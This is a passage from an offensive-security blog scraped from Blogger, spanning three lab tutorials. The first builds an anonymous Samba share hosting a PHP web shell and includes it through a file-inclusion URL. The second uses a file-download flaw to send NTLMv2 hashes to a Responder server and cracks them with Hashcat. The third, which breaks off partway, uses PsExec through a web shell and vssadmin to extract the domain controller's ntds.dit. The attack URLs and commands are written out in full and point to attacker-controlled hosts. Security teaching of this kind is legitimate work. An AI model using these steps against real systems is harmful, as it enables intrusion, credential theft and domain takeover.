<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-GdgprJpLdqmCoIbfxWMgDdG-fWDRAebfv6PC3fndKZs8jTpVB1NcynyRjN82W0Evj_xCuCujlvrqh5rzABAQOiPEQvnHjtn0xbB5yLXzjiEmHWFXB8wqlg8AeohA7DYMmtHrN_pvyC4/s1600/rfi_permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="749" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-GdgprJpLdqmCoIbfxWMgDdG-fWDRAebfv6PC3fndKZs8jTpVB1NcynyRjN82W0Evj_xCuCujlvrqh5rzABAQOiPEQvnHjtn0xbB5yLXzjiEmHWFXB8wqlg8AeohA7DYMmtHrN_pvyC4/s1600/rfi_permissions.png" /></a></div>
<br />
Run below mentioned command to remove default content of SAMBA server config file<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> echo > /etc/samba/smb.conf</textarea>
<br />
<br />
Put below mentioned content in file '/etc/samba/smb.conf'
<br />
<br />
<textarea cols="35" rows="20">
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
</textarea>
<br />
<br />
Now, restart SAMBA server to apply new configuration spcified in config file /etc/samba/smb.conf
<br />
<br />
<textarea cols="30" rows="1" style="text-align: center;"> service smbd restart </textarea>
<br />
<br />
Once SAMBA server has been restarted successfully, try to access SMB share and make sure SAMBA server is not asking for credentials.<br />
In my case, SAMBA server IP is 192.168.0.3, I need to access SMB share in Windows file explorer as mentioned below:<br />
<br />
<textarea cols="18" rows="1" style="text-align: center;"> \\192.168.0.3\</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqEz50bzikcWDZYcVHtVbGS4iAgH29xqhO_4wkmuc1YusdAEQhE-wbg6qukEHN5M3BVA0eN6A2Sa-w-aiBYf_20dPakzgleMqiws9yYipMaisdostX6WSvpsdTE9AK-bA3hHjMxOK2Ju8/s1600/rfi_smb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqEz50bzikcWDZYcVHtVbGS4iAgH29xqhO_4wkmuc1YusdAEQhE-wbg6qukEHN5M3BVA0eN6A2Sa-w-aiBYf_20dPakzgleMqiws9yYipMaisdostX6WSvpsdTE9AK-bA3hHjMxOK2Ju8/s1600/rfi_smb1.png" /></a></div>
<br />
<b><span style="color: red;">Hosting PHP web shell in SMB share</span></b><br />
Awesome, SMB share is accessible and showing that directory 'ica' is present.<br />
Now, host PHP shell in directory '/var/www/html/pub' which is the directory of the SMB share diretory 'ica'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBgdalhPgqDmsWRMX1X14DaE03nXIvnuQ-jrxevI7kuDYuFWVk3s8x8CTOUdWeEUjWR_OFHPiCu23pqNdh13XEckDMuJ-b9pZ4JqvlvZn89O4C3og4BX0hcqX_NAcVO_yYHrKFLe565o/s1600/rfi_download.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="1504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrBgdalhPgqDmsWRMX1X14DaE03nXIvnuQ-jrxevI7kuDYuFWVk3s8x8CTOUdWeEUjWR_OFHPiCu23pqNdh13XEckDMuJ-b9pZ4JqvlvZn89O4C3og4BX0hcqX_NAcVO_yYHrKFLe565o/s1600/rfi_download.png" /></a></div>
<br />
<br />
Once we have PHP shell in directory '/var/www/html/pub', access the directory SMB share directory 'ica' using Windows file explorer.<br />
<br />
<textarea cols="20" rows="1" style="text-align: center;"> \\192.168.0.3\ica\</textarea><br />
<br />
You will see PHP shell is present is the SMB share directory. In my case it is box.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZJPQsSZy3DzvmcyML1CUsdBXzrW8v9Q22ZKmadvWiLyaSC5PcwPldVBuEoISBohnXJy8fom45rTRl1kqEz-WJf64UvwOjWIs7BXHU1_hrED6akImJK1JstshMktpCSY-ubkRXCzP5htw/s1600/rfi_smb2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="657" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZJPQsSZy3DzvmcyML1CUsdBXzrW8v9Q22ZKmadvWiLyaSC5PcwPldVBuEoISBohnXJy8fom45rTRl1kqEz-WJf64UvwOjWIs7BXHU1_hrED6akImJK1JstshMktpCSY-ubkRXCzP5htw/s1600/rfi_smb2.png" /></a></div>
<br />
<br />
<b><span style="color: red;">Attacking the File Inclusion vulnerable parameter</span></b><br />
Perfect, let's use this PHP shell SMB link and browse it using vulnerable PHP code.<br />
<br />
<textarea cols="75" rows="2" style="text-align: center;"> http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php
</textarea><br />
<br />
Dang Dang! PHP vulnerable code fetched the web shell from SMB share and executed the code \m/ on application server. We have bypassed the restriction and included the web shell hosted on remote host.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDW1hf7bIocQPYwNIVaZ1u12uHzcoQ7m6K6K4phSbh-pCbHhKmbhwKNHfEHVNICnZcxoTbwum4blHkfCWat8pncGTKQpRptzF6M3sjUTS0umgSGROPjpFV9FX087pBiJDgX2ldf96S65w/s1600/rfi_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDW1hf7bIocQPYwNIVaZ1u12uHzcoQ7m6K6K4phSbh-pCbHhKmbhwKNHfEHVNICnZcxoTbwum4blHkfCWat8pncGTKQpRptzF6M3sjUTS0umgSGROPjpFV9FX087pBiJDgX2ldf96S65w/s1600/rfi_shell.png" /></a></div>
<br />
<br />
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-64010494225986621442018-12-16T01:07:00.000+05:302019-05-18T22:41:57.286+05:30How to steal NTLMv2 hashes using file download vulnerability in web application <div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This blog post is demonstration of "Abuse of File download vulnerability to steal NTLMv2 Hashes".<br />
In this scenario, web application is hosted on a machine which is part of Windows Active directory domain and allows user to download file without checking its path.<br />
<br />
Attacker can take advantage of file download vulnerability to trigger request to attacker controlled server which is having "Responder" tool running on it to steal the NTLMv2 hash from the server. Responder tool "SMB auth server" will force target server to handover the NTLMv2 hash, later that NTLMv2 hash can be used to: <br />
1. perform relay against any windows machine having "SMB Signing Disabled" or attacker can try to 2. crack them using hash cracking tools like Hashcat<br />
<br />
Let's start with the web application which is having file download vulnerability and making SMB request to download file from the remote host.<br />
Vulnerable PHP script is<br />
<br />
http://192.168.56.200:8080/file.php?file=any_file.txt<br />
<br />
and PHP code is <br />
<br />
<textarea cols="100" rows="34"><?php
function file_download($download)
{
if(file_exists($download))
{
header("Content-Description: File Transfer");
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Accept-Ranges: bytes');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: ' . filesize($download));
header('Content-Type: application/octet-stream');
ob_clean();
flush();
readfile ($download);
}
else
{
echo "<script>alert('file not found');</script>";
}
}
$file_name=trim($_GET['file']);
file_download($file_name);
?>
</textarea>
<br />
<br />
PHP script will perform file download if we specify any file and it exists on the system.<br />
Script is considering relative as well full path, so we will take advantage of this behavior and will make SMB request to the server which is having Responder tool running on it.<br />
<br />
Let's assume, actual request which allow user to download file is<br />
<br />
http://192.168.56.200:8080/file.php?file=box.html<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCJnwjTdmV_aZoIiMzxm4ssW8f9r4hVpAuhMFYoORpcACckxvXWxIoTmJM8ZeDCCqCzKGBCnWLGwODGcthOVPM9m_pf15lggHY3SpiTydmBbPjyFLAtp4MHiqd3tB0qST8pyrA2BJmd4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="502" data-original-width="763" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCJnwjTdmV_aZoIiMzxm4ssW8f9r4hVpAuhMFYoORpcACckxvXWxIoTmJM8ZeDCCqCzKGBCnWLGwODGcthOVPM9m_pf15lggHY3SpiTydmBbPjyFLAtp4MHiqd3tB0qST8pyrA2BJmd4/s1600/1.png" /></a></div>
<br />
<br />
My server where Responder is running is having IP - 192.168.56.102<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilafmB5_HLC9EmSfLKhU5Ary3ad6pVq2mkSBSXB-ia0dbGYuS0QWlhZecru5wJ1zfpNQix4Ce3RqUD3sP4vtJU76iCMOWbY_jvT6S8I6Oo1UgT34YRrDbNsA67u1FieECjII-YS464dDU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="746" data-original-width="1055" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilafmB5_HLC9EmSfLKhU5Ary3ad6pVq2mkSBSXB-ia0dbGYuS0QWlhZecru5wJ1zfpNQix4Ce3RqUD3sP4vtJU76iCMOWbY_jvT6S8I6Oo1UgT34YRrDbNsA67u1FieECjII-YS464dDU/s1600/2.png" /></a></div>
<br />
Now, make SMB request to Responder using vulnerable parameter and it should be like<br />
<br />
http://target_web_server/vulnerable_script.php?parameter=\\Responder_server_IP\any_file.txt<br />
<br />
Here, target_web_server is 192.168.56.200:8080<br />
vulnerable_script.php is file.php with parameter "file" and Responder_server_IP is 192.168.56.102<br />
Final URL is<br />
http://192.168.56.200:8080/file.php?file=\\192.168.56.102\box.html<br />
<br />
If everything goes fine, Responder will capture the NTLMv2 hashes of target server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3QUDbxX_PvUNkf8DxarTLt6AkhHFi4skkiu5KrBbir2cQEDjn-DETvTleH7FaCK8B_Vm1Mo32oXOmtGn469Zg1woBh2_kf6UaO6NYoGmtJxX5NB4TQki3D_dIJ7PsJ0S8Px-C3Gv-M/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="621" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlK3QUDbxX_PvUNkf8DxarTLt6AkhHFi4skkiu5KrBbir2cQEDjn-DETvTleH7FaCK8B_Vm1Mo32oXOmtGn469Zg1woBh2_kf6UaO6NYoGmtJxX5NB4TQki3D_dIJ7PsJ0S8Px-C3Gv-M/s1600/3.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Above screenshot is showing that Responder captured the hash from target server and target web server is running with the privilege of Windows Active Directory user having username "user3".<br />
<br />
Now, one can try to crack this captured hash to get the plain text password. "Hashcat" is awesome tool to perform fastest hashcracking. It support CPU/GPU hash cracking and has support for multiple hash formats. Hahcat official download website is: - https://hashcat.net/hashcat/ Download good password dictionary, here is one https://hashkiller.co.uk/downloads.aspx Run the hashcat and wait if luck is on our side. <br />
<span style="background-color: white; color: #24292e; display: inline; float: none; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; font-style: normal; font-weight: 400; letter-spacing: normal; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"></span><span style="background-color: white; color: #24292e; display: inline; float: none; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; font-style: normal; font-weight: 400; letter-spacing: normal; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGm997BPhbwjMWFVeiyiD6w9l3OhtAauNYQahpeKMHxakEAGYq4rXb38U929lswczUliOqTUUpN4cg5mgQgRIDLqbX3o89_WnNFgC8ty2I25uQV97hHdX4LSKytaeGvH9PMLLj0YGTO30/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="602" data-original-width="1553" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGm997BPhbwjMWFVeiyiD6w9l3OhtAauNYQahpeKMHxakEAGYq4rXb38U929lswczUliOqTUUpN4cg5mgQgRIDLqbX3o89_WnNFgC8ty2I25uQV97hHdX4LSKytaeGvH9PMLLj0YGTO30/s1600/4.png" /></a></div>
<br />
<br />
Hashcat got the plain text password of the NTLMv2 hash captured by Responder.
Now we can play around the Windows Active Directory little bit more as we have credential of one Domain User. <br />
That's all from my side.
<br />
Thanks for reading.<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<br />
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain"># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-22289281402666671922018-12-06T00:55:00.001+05:302019-05-24T17:04:10.172+05:30Remotely dump "Active Directory Domain Controller" machine user database using web shell<div dir="ltr" style="text-align: left;" trbidi="on">
Hello All,<br />
<br />
This time i want to share something related to "Windows Active Directory(AD)" environment related.<br />
I am gonna demonstrate "How to dump Windows Active directory user database" just using web shell.<br />
There may be the case, during a Pentest, Pentester got the "Domain Admin" user credentials and web shell access on one of the machine connected to Windows Active Directory forest. Pentester trying to get Reverse shell and due to some reasons not getting it (Let's say Network Firewall is not allowing) but Pentest goal is to dump AD user database i.e users and NTLM password hashes of the AD environment.<br />
I also faced same issue during pentest (was not having server with public IP :P). After playing around this issue a little-bit, i got a way which is helpful to achieve above mentioned goal just using web shell if we have "AD Domain Admin" user credentials.<br />
Here, assumption is below mentioned:<br />
<br />
1. AD Domain Controller machine (queen.DC1.indishell.lab - 192.168.56.200)<br />
2. Compromised windows machine - connected to AD (LABONE - 192.168.56.101)<br />
3. Managed to get Windows AD Domain Admin user (using any exploit, like in my case i got Domain Admin user password using legendry "<i style="-webkit-text-stroke-width: 0px; background-color: white; box-sizing: border-box; color: #4a474b; font-family: Lato, sans-serif; font-size: 16px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><b style="box-sizing: border-box; font-weight: 700;">MS14-025</b></i>" exploit)<br />
<br />
Now, I have web shell access on Windows machine which is connected to domain i.e "LABONE" and its IP is "192.168.56.101". I got Domain Admin having user name "user1" and it's password is "ica_1046".<br />
<br />
In this case, I will be using 2 binaries:<br />
1. psexec.exe <- Windows internal tool<br />
2. vssadmin <- command to create/delete volume shadow copy of a Windows drive.<br />
<br />
Anyhow if we manage to run "vssadmin" command on Windows AD Domain Controller machine, "vssadmin" command will generate volume shadow copy of "C" drive and from that shadow copy we can copy "ntds.dit" and "SYSTEM" files of AD Domain controller machine.<br />
To achieve the above mentioned task, we will be using "psexec.exe" which is capable of executing commands on remote Windows machines if we specify the target machine IP, domain admin username and its password with "elevated" option (by specifying -h).<br />
We need to upload psexec.exe on Windows machine "LABONE" using web shell. From web shell, we will specify the AD Domain Controller machine IP, Domain admin user username and its password along with "vssadmin" command.<br />
psexec binary will execute vssadmin command on Windows AD Domain Controller machine remotely. After creating "C" drive shadow copy, we need to copy the "ntds.dit" and "SYSTEM" file from that shadow copy to the machine where we have web shell access i.e to Windows domain machine "LABONE". This task can be done using "psexec" binary, we just need to specify the target AD Domain Controller machine IP, Domain Admin username and it's password along the "copy" command in which we specify "copy command, please copy the ndts.dit and SYSTEM file from shadow copy to LABONE machine using SMB". I will be copying the files in same directory where i have dumped psexec binary file on "LABONE" machine.<br />
<br />
General command for using "psexec" binary to execute command on remote host<br />
<textarea cols="120" rows="1">psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute"<br />
</textarea>
<br />
in my case, information was given below:<br />
remote_IP 192.168.56.200 (queen.DC1.indishell.lab)<br />
user_name user1<br />
password_of_the_user ica_1046<br />
<br />
I have web shell on windows domain machine "LABONE" and uploaded psexec binary on the server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIctcZTPbcHrKRiHrp50PtTYMWpt_FZjVMNOqqhDTCxf-eDhuugidN6-TTlNyR6OUhLyWRXiLi6AMobXXiGLIbc0osK0NG8CNgraJmY42A0xGMHiSZvbrtsaZG-DZet1YCnX_HKYaR48g/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="859" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIctcZTPbcHrKRiHrp50PtTYMWpt_FZjVMNOqqhDTCxf-eDhuugidN6-TTlNyR6OUhLyWRXiLi6AMobXXiGLIbc0osK0NG8CNgraJmY42A0xGMHiSZvbrtsaZG-DZet1YCnX_HKYaR48g/s1600/1.png" /></a></div>
<br />
First, I am checking whether is there any shadow copy of "C" rive is available or not. To list the available volume shadow copies, command is:<br />
<textarea cols="70" rows="1">vssadmin list shadows</textarea>
<br />
Here, web shell is not capable of showing all the output of command executed by psexec binary on remote host, so i am just redirecting the output of the command the machine "LABONE" (where i have web shell access). I will be directing output of the command in directory "C:\xampp\htdocs\box\ps\"<br />
And command to perform this task is:<br />
<textarea cols="120" rows="2">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt" </textarea>
<b> </b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRssnU3kn0x-NXVXDp-JeiVDTfS9G4hMYXVRh0ZWux6JWTPHq6OiplM9nDrCr0mUKc1x30yCqxsyivK1uCQS759FHFrb3AO7mvpKAe8b4l1AIOACN25H_RYcWocokMTPzCVIUPMvxDWlU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1491" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRssnU3kn0x-NXVXDp-JeiVDTfS9G4hMYXVRh0ZWux6JWTPHq6OiplM9nDrCr0mUKc1x30yCqxsyivK1uCQS759FHFrb3AO7mvpKAe8b4l1AIOACN25H_RYcWocokMTPzCVIUPMvxDWlU/s1600/2.png" /></a></div>
<b> </b> <br />
Web shell is showing that psexec is executing command on remote Windows AD Domain Controller machine. If everything goes fine, we will get file with name "out.txt" in directory "C:\xampp\htdocs\box\ps" and it will contain the output of "vssadmin list shadows" command which was executed on AD Domain controller machine (192.168.56.200).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVeN4f6Jz0A0FwGvPjt-jQyNB21o4DxT2Ra4OBKwHJ64ZJRXcV9JtwLFdL_eBOiatxIAx_RT7OgNGolvv1wMSYSzBTAgFFkI7Irmr3GrzhzomF8iJcsQxP1qr0HQCyFYS_DZutVL97mI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="615" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVeN4f6Jz0A0FwGvPjt-jQyNB21o4DxT2Ra4OBKwHJ64ZJRXcV9JtwLFdL_eBOiatxIAx_RT7OgNGolvv1wMSYSzBTAgFFkI7Irmr3GrzhzomF8iJcsQxP1qr0HQCyFYS_DZutVL97mI/s1600/3.png" /></a></div>
<br />
Yes, we have file in the directory. Let's check the content of the file "out.txt".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gJnIgZRXVdMH1fn4EBVXBqyhUER8mY7i-4X-jfgn3BFGQR58b3hlWImVljfG9W6tVSVpY1um1WhkmwyALe0DsYAC7nD6eJqOCYhSHyewhS7av7BZ2D12gLI3dJHMtKgRXTxNl9SOKnA/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gJnIgZRXVdMH1fn4EBVXBqyhUER8mY7i-4X-jfgn3BFGQR58b3hlWImVljfG9W6tVSVpY1um1WhkmwyALe0DsYAC7nD6eJqOCYhSHyewhS7av7BZ2D12gLI3dJHMtKgRXTxNl9SOKnA/s1600/4.png" /></a></div>
<br />
"out.txt" file content is showing that target Domain controller machine does not has any volume shadow copy till now.<br />
<br />
Let's create one shadow copy of "C" drive so that we can steal "ntds.dit" and "SYSTEM" file from it.<br />
Command to create volume shadow copy of c drive is<br />
<textarea cols="120" rows="1">vssadmin create shadow /for=C: </textarea>
<br />
<br />
one important thing which we need to keep in mind is, we need to have the name of newly created volume shadow copy of "C" drive and it will be in the output of the command, so we will be redirecting the output of the above command to the machine on which we have web shell access.<br />
To copy the "ntds.dit" and "SYSTEM" file from target machine, we need to have the name of shaodw copy.<br />
Final command will be:<br />
<textarea cols="120" rows="1">PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"</textarea>
<br />
<br />
In above mentioned command, psexec binary is executing command on Windows AD Domain Controller machine (192.168.56.200) to create shadow copy of "C" drive and then redirect the output of that command to machine "LABONE" in file "C:\xmpp\htdocs\box\ps\out.txt"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLCmUOAlw3Yen072P6O_rLyJMqj9ohvyGVS1Vh5sNugb2eQ1xiil3kOEG6yAB5hooaSRWple5I8EZWYs6aNztePrBkEmfFHarwS7JQaaykNDcs-M4YNVSI2jDmT2bmBEgIIOyVlDo_rXQ/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="617" data-original-width="1562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLCmUOAlw3Yen072P6O_rLyJMqj9ohvyGVS1Vh5sNugb2eQ1xiil3kOEG6yAB5hooaSRWple5I8EZWYs6aNztePrBkEmfFHarwS7JQaaykNDcs-M4YNVSI2jDmT2bmBEgIIOyVlDo_rXQ/s1600/5.png" /></a></div>
<br />
